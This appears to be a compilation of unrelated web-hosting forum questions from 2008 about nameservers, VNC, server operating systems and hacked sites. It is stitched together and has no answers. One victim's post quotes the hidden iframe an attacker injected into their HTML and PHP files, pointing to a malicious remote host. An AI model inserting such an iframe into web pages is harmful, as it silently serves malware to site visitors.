Find Out If Nameservers Are Running On Your Server
Aug 10, 2008
I hired a guy to secure and setup nameserves on my dedicated box. I'm on a time crunch and have not heard from him in 24 hours, so thought I'd ask here.
How can I find out if nameservers are running on my box, and what IP they are running on?
I updated to make my domain also be nameservers ns1 and ns2 with ip's tied to them. How do I know when the nameservers are working and ok to use?
Is there something physical I can do other than switching my domain to point to it? I really dont want to do that cause then my site could be down while it is still propogating.
I just installed tightvnc with the rpm on their website. I'm currently running CentOS 5 with GNOME up and running. FreeNX works fine, but we also need to install tightvnc for our business.
When I try running it, I get this:

I'm trying to run freenx and tightvnc. I can't get freenx working, so I moved on to try to install tightvnc. I installed the Fedora rpm on my CentOs box. Everything installed.
When I tried to run it, it failed and exited. It says I'm missing fonts. I had the technicians install GNOME when it was being installed, but I don't think its configured.

Will the nameservers work if the nameservers are pointed to a parking page? For example:
I need to change my nameservers to ns1.mywebhost.com and ns2.mywebhost.com
(nameservers are made up)
These nameservers are from my web hosting service provider. When I visit the nameservers, it shows up a parking page from a domain parking service (let's say NameDrive parking page)
Will the nameservers function correctly and will my websites work? I have this question because usually the nameservers that I use, they always point to a CP page or something like that rather than a parking page.
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php 24353.php 24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How does Name servers setup with dedicated server? can I ask my hosting provider setup private name servers for my clients (who will be on shared and VPS?)?
We will use IP addresses for this reason? Is Hyper-V available on Windows 2003 standard?
Im trying to find the most reliable webhoster on the wed. Im looking to start a business where i can offer regular hosting as well as reseller accounts. Im looking for a good server with a low price.
Is there a way to use ns1/ns2.yourhostdomain.com for not only your shared hosting clients but also for your linux AND windows 2003 dedicated server clients (or vps)?
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code: <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden">< /iframe> The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
Most people probably run Linux on their media servers, but since I don't know much about Linux and the media server we have is unmanaged, I was wondering how you guys feel about running Windows Server 2003 Std on a media server instead of Linux. We'll only be using the server to host Flash video files (.flv) and we'll be serving those vids on websites hosted on other servers, resulting in approx. 50,000-100,000 media views per day (filesizes range from approx. 5MB to 10MB). We don't want to run Windows Media Services, just a Web server (IIS6) and have the Flash video players on the external websites take care of the streaming/downloading part.
our company is ordering a new dedicated server and we are a little unsure what we should choose as far as the full hostname and nameservers of this one server.
This server will have a couple different websites on it, but really, there is only one BIG website on it... let's call it abcd.com.
While most would pick a hostname of host.abcd.com for instance, if at all possible, we would like the domain name part of the hostname to be something different than abcd.com. We own a domain name that doesn't point to anything yet (unuseddomain.com) and we were wondering if we could use that domain in our hostname.. host.unuseddomain.com.
And instead of using abcd.com as the domain name for our own nameservers (ie. ns1.abcd.com, ns2.abcd.com), we would like to again, use the unused domain name we own (unuseddomain.com) for the nameservers domain name: ns1.unuseddomain.com, ns2.unuseddomain.com.
So...
Will this work? Is this perfectly acceptable?
And lastly...
Since the one website we really care about on this server (the one we got the server for in the first place) is abcd.com, is using the unuseddomain.com for the hostname and nameservers (as above) a bad choice in anyway regarding email deliverability? I understand that mail ISP's (hotmail, yahoo, etc.) do all kinds of checks on hostnames (PTR), etc... and we want to make sure that we aren't hurting ourselves in anyway by using an "empty" domain name that we own as our hostname's and nameserver's domain name.
For instance, if we send mail from the abcd.com account, it will use mail.abcd.com (1.1.1.1) as it's outgoing mail server... Hotmail will see this... do a reverse-dns lookup on 1.1.1.1 and see host.unuseddomain.com. See what I'm saying? It all will work, but will it toss up red flags?
I have a problem with one of my domain. Some users around the world cannot access the website, but they can ping and traceroute the server without any problems. I am able to access the website perfectly.
Site URL is www.djluv.in
And we are using IPB 2.2
Moreover if theres another domain on the same server, they can access it.
There are about 25-30 users who are facing this problem, but from different part of the world so I cant even say ISP problem.
APF has been shutdown, no Ban Filters on IPB or cpanel.
What are the possible reasons why they couldn't access the website? how to fix the problem?
what the max number of hits is a quard core server with RAID disk system can handle, it is running on a Linux with separated MySQL server?
The host says there are no restrictions on the bandwith, but somehow it is strange we always only have MAX 300 users online (24/7/365) now I wonder if it just is that way or if some users might be denied access from time to time when they try to enter some of the websites hosted on the server ?
Maybe you know a monitoring service or something that can tell if this is an issue.
I currently have one dedicated server and four VPSs all using Plesk and all having their own name servers controlled by Plesk. What I'd like to do is consolidate everything so all my sites use one set of name servers.
I'm a PHP developer (and will be developing my own front end), and only have limited knowledge of administrating a server, so first of all if anyone has done this before and made mistakes in the process, please could you share them with me so I can avoid making them?
Secondly, I would like to use a MySQL database for storing the DNS info - I've found a tutorial at [url]which I'd like to use - could someone who knows what they're talking about have a skim through this and reassure me that everything there is correct and up to date (the article was written in early 2006 - just checking nothing in the world of DNS has changed since)?
I've a production server running web, smtp, ftp, cpanel...
Now I need to run different solutions on the same server (like PABX, games), of course I can't put all on the same place (to better control security, resource usage etc..) Is it possible to install xen without affecting my production environment? It would be a good choice doing that?
I want to start up my web server again. I have Windows XP hosting my web server right now. and, it's slow. Should i stick with Windows, run IIS and use httpZip from Port80? I really like microsoft, and don't want to change and adapt to something else. give me advice
Or, should I run Linux I would run Linux on it, but I don't know how. And they have different version of Linux. Example Redhat, Ubuntu etc. Which one should I go for?
Also, what do I do if I have a netgear ethernet card? Is that Linux? Is it compaitable with Redhat?
And last question, what do I use for security? I'm a hacker, yeah.. I know what all people can do to websites. How do I stop them? DoSing, Cross Scripting, XML Attacks, MySql Injection.. Etc.
